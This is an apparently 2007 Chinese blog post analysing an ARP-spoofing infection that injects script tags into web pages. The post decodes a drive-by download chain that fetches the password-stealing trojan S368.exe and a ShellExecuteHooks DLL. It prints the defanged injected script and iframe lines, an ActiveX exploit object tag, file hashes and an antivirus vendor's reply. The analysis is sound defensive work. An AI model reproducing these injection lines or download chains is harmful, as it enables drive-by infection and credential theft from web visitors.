ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaa
endurer 原创
2007-08-28 第1版
昨天单位又有电脑中了ARP病毒,打开任一网页时,Kaspersky 总报告已检测到: 木马程序 Trojan-Downloader.JS.Psyme.kf。
中午因为帮网友检修电脑(见: 遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等1 ),未能进行分析。
现在解析一下。
查看网页代码,发现首部被加入:
/---
<script src=hxxp://*67.1*9.116.188/n**.js></script <script language="javascript" src="hxxp://v*.9**1t*g.net/k*.js"></script>
---/
hxxp://*67.1*9.116.188/n**.js 的内容为 eval() 执行自定义函数。经过3次解密得到原始代码,功能是输出代码:
/---
<script src="hxxp://o*raN.3**168*a*.com/s368/NEwJs2.js"></script>
<iframe width=0 height=0 src="hxxp://o*raN.3**168*a*.com/s368/t368.htm"></iframe>
<iframe width=0 height=0 src="hxxp://o*raN.3**168*a*.com/s368/t368.gif"></iframe>
---/
hxxp://o*raN.3**168*a*.com/s368/NEwJs2.js 内容为:
/---
StrInfo="/x3C/x73/…(略)…/x70/x74/x3E"
document.write(StrInfo);
---/
经过2次解密得到得到原始代码,功能是下载 S368.exe,保存到 %windir%中,文件名由自定义函数GnMs(n)生成,格式为~Temp****.tmp,其中 * 为数字,再调用 cmd.exe /c 启动。
文件说明符 : D:/test/S368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-27 14:42:58
修改时间 : 2007-8-27 14:43:0
访问时间 : 2007-8-27 0:0:0
大小 : 22575 字节 22.47 KB
MD5 : 3c5c397b83b4377ac4a8c1e60f84af81
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.aqq
主 题: |
病毒上报邮件分析结果-流水单号:20070827145718842307 |
发件人: |
"" <send@rising.net.cn> <script language="JavaScript" type="text/javascript">
<!--
var aAddAdress = document.getElementById("aAddAdress");
aAddAdress.href = document.guideform.guidelinks.options[5].value;
var aDeleteAdress = document.getElementById("aDeleteAdress");
aDeleteAdress.href = document.guideform.guidelinks.options[4].value;
document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[5]);
document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[4]);
//-->
</script> |
发送时间:2007.08.27 15:11
|
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:S368.exe
病毒名:
Trojan.PSW.Win32.OnlineGames.xyz 您所上报的病毒文件将在19.38.02版本中处理解决。
hxxp://o*raN.3**168*a*.com/s368/t368.htm 内容为 javascript 代码,经过2次解密,得到原始代码,开始部分为:
/---
<script language=javascript>fN56=8139;function _nr(){return true}onerror=_nr;dA15=9282;;_licensed_to_="huyufeng";</script><script src="important.js"></script>
---/
其中important.js 封装了控制thunder_server任务的代码,如开始(分类)全部任务,暂停(分类)全部任务,删除(分类)全部任务,还原(分类)全部任务等。
接下来的代码则是创建并利用thunder_server下载 S368.scr 到 c:/。
S368.scr 与 S368.exe 相同。
hxxp://o*raN.3**168*a*.com/s368/t368.gif 内容为 javascript 代码,经解密得到原始代码,开始部分为:
/---
<script language=javascript>gW91=3841;function _nr(){return true}onerror=_nr;fK51=4984;;_licensed_to_="huyufeng";</script>
---/
接下来的代码则判断 Windows 和 IE 版本,如果使用的是 WinXP、IE6,则输出代码:
/---
<iframe height=0 width=0 src=/"t368ok.gif/"><//iframe>
---/
hxxp://o*raN.3**168*a*.com/s368/t368ok.gif 内容为 javascript 代码,经解密得到原始代码,开始部分为:
/---
<script language=javascript>hA57=933;function _nr(){return true}onerror=_nr;gN17=2076;;_licensed_to_="huyufeng";</script><object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>
---/
接下来好像是利用溢出漏洞的代码,有时间再好好看看。
hxxp://v*.9**1t*g.net/k*.js 检查名为Cookie1的cookies是否存在,不则在则创建,并输出代码:
/---
<SCRIPT LANGUAGE="javascript1.2" SRC="hxxp://v*.9**1t*g.net/t.js"></SCRIPT>
---/
hxxp://v*.9**1t*g.net/t.js 功能是输出 escape加密的数据,解密后的数据为 vbscript 脚本代码,功能是 使用自定义函数LeoFunc() 解密数据 并 Execute,解密后数据为vbscript 脚本代码,其中部分数据仍使用自定义函数LeoFunc() 加密,功能是 下载 w.dll,保存到 %windir%,文件名为 Winhelp.dll,修改注册表进行注册,CLSID为 {6B3FCDC8-E5C7-477a-817E-72865A7758AE},并写入ShellExecuteHooks键下。
文件说明符 : D:/test/w.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-27 14:45:2
修改时间 : 2007-8-27 14:45:4
访问时间 : 2007-8-27 0:0:0
大小 : 7680 字节 7.512 KB
MD5 : 28e9c359886f7178931b3facc57e5dfa
Kaspersky 报为 Trojan-Downloader.Win32.Agent.bgk,瑞星 报为 Trojan.DL.Win32.Agent.xaa
分享到:
相关推荐
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
3、Trojan-Ransom.Win32.Agent.iih 4、Trojan-Ransom.Win32.Autoit 5、Trojan-Ransom.AndroidOS.Pletor (安卓下的勒索软件) 6、Trojan-Ransom.Win32.Rotor 7、Trojan-Ransom.Win32.Lamer 8、Trojan-Ransom.Win32....
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
2020年trojan最新windows64客户端
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
Gridinsoft Trojan Killer木马克星是专门来禁用/删除没有用户不必手动编辑系统文件或注册表的恶意软件。该方案还删除一些恶意软件进行了一些标准的防病毒扫描器忽略额外的系统修改。 Trojan Killer扫描所有的...
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury...7、Trojan-Ransom.Win32.CryptXXX (目前能解版本1、版本2,版本3)
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。...
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
trojan
通过对 “冰河”、 “蓝色火焰”、 “BO”、 “广外女生”、 “黑洞”、 “网结”病毒(Worm.Plexus.b)、 “将死者”病毒(Worm.Gone.38912)、 “恶鹰”病毒(Worm.Beagle)、 “网络天空”病毒(Worm.NetSky)、传奇叛逆...
增加5个变种的查杀,分别是Trojan.Win32.Undef.iqd,Trojan.Win32.Undef.pun,Trojan.Win32.Undef.kcq等 文件信息: Size: 148992 bytes File Version: 2.03 Modified: 2008年9月3日, 15:21:22 MD5: 0B85E5AFC3E...
js.scob.trojan
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
ARP地址欺骗类病毒(以下简称ARP病毒)是一类特殊的病毒,该病毒一般属于木马(Trojan)病毒,不具备主动传播的特性,不会自我复制。但是由于其发作的时候会向全网发送伪造的ARP数据包,干扰全网的运行,因此它的危害...